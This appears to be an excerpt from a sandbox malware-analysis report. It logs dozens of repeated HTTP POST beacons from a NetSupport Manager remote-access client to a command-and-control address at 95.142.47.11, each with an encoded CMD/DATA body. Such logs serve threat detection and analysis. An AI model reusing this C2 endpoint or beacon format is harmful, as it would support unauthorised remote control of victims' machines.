                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:51.377055883 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:51.477080107 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:51.583636045 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:51.706655025 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:52.513075113 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:52.614058018 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:52.717472076 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:52.818120003 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:52.919138908 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:53.020015955 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:53.120014906 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:53.220295906 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:53.320182085 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:53.421056032 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:53.521106958 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:53.620870113 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:53.721946001 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:53.822062969 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:53.923058987 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:54.026788950 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:54.127875090 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:54.228080988 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:54.329024076 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:54.430001020 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:54.530920029 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:54.631874084 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:54.732319117 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:54.833108902 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:54.933176994 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:55.034039021 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:55.133918047 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:55.234901905 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:55.335905075 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:55.435863018 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:55.537034988 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:55.637000084 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:55.736843109 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:55.836886883 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:55.938060045 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:56.175870895 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:56.275899887 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:56.376864910 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:56.477087975 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:56.578003883 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:56.678006887 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:56.778951883 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:56.879766941 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:56.978992939 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:57.079998016 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:57.179912090 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:57.280900002 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:57.385587931 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:57.485898018 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:57.587060928 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:57.687860012 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:57.788177967 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:57.888849020 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:57.988920927 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:58.090686083 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:58.190881014 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:58.393213034 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:59.423307896 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:59.522979975 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:59.623967886 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:59.724839926 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:59.824982882 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:59.926001072 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:00.025996923 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:00.126090050 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:00.227035046 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:00.326966047 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
